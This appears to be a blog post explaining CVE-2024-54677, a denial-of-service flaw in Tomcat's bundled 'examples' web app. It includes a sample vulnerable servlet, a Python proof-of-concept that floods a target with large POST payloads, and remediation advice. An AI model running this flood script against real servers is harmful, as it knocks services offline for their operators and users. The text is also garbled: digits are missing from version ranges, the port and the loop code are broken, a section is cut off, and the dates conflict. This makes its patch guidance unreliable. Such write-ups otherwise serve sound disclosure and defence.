Apache Tomcat is one of the world’s most used open-source web servers for Java. However, even trusted software like Tomcat can sometimes have dangerous flaws. In June 2024, security researchers discovered a serious vulnerability—tracked as CVE-2024-54677—that can allow anyone to take down a Tomcat server using only simple HTTP requests. This post explains what happened, how the exploit works (with code!), and what you should do right now to stay safe.
What is CVE-2024-54677?
CVE-2024-54677 is a Denial of Service (DoS) vulnerability found in the "examples" web application bundled with Apache Tomcat. It allows an attacker to force the server to consume unlimited resources—CPU and memory—until it crashes or slows to a crawl. This is also called "uncontrolled resource consumption."
> Affected versions:
> - Tomcat 11..-M1 through 11..1
> - Tomcat 10.1.-M1 through 10.1.33
> - Tomcat 9...M1 through 9..97
You are vulnerable if you use any of these versions and your “examples” web application is deployed (even by accident).
How Does the Vulnerability Work?
The problem lies in how the Tomcat “examples” app handles user-provided input, especially in servlets or JSP pages that store or echo back what you send them without limit. Typically, these "examples" are not meant for production, but sometimes, people leave them running accidentally.
Here’s a simplified version of a vulnerable code pattern
protected void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
String content = request.getParameter("content");
// BAD: No size restriction!
for (int i = ; i < 100000; i++) {
response.getWriter().println(content);
}
}
Notice that if content is a large string, or if you send many requests at once, the server will consume huge memory and CPU—fast!
The Exploit: Simple but Powerful
A remote attacker can exploit this flaw by sending a POST or GET request with a huge payload—using a simple script or even curl. Below is a proof-of-concept (PoC) attack using Python:
Exploit Script
import requests
# Change this to your Tomcat server’s address and port
url = "http://target-server:808/examples/servlets/servlet/YourVulnerableServlet";
# Fill 'A' to 10 million characters
payload = {'content': 'A' * 10_000_000}
for i in range(100): # 100 requests in a loop
r = requests.post(url, data=payload)
print(f"Sent request {i+1} - Response: {r.status_code}")
What happens:
Impact other apps running on the same Tomcat server.
- The attack does *not* steal data directly, but some DoS attacks can be chained with others for more harm.
How to Fix the Problem
Immediate fix:
STOP exposing the “examples” app on any production or public server.
- Delete or remove the examples folder from webapps/.
Permanent fix:
9..98 or newer
The patched versions put strict limits on user input and safe coding practices in the “examples” codebase.
More Info and References
- Official Apache Tomcat Security Advisory
- CVE-2024-54677 Details at NVD
- Tomcat Downloads
- Understanding Denial-of-Service
Conclusion
CVE-2024-54677 is a real-world DoS risk that can knock your Tomcat-hosted site offline with a few HTTP requests. Even though it affects only the "examples" web app, too many servers leave it running by mistake. The fix is straightforward: upgrade Tomcat, remove "examples," and always keep test/demo apps OFF production servers.
If you’re a developer or sysadmin using Tomcat, upgrade now—don’t wait to become a target!
*Stay safe—patch early, patch often!*
_If this guide helped you understand and address the vulnerability, please share it with your team or friends running Apache Tomcat servers!_
Timeline
Published on: 12/17/2024 13:15:18 UTC
Last modified on: 12/18/2024 17:15:14 UTC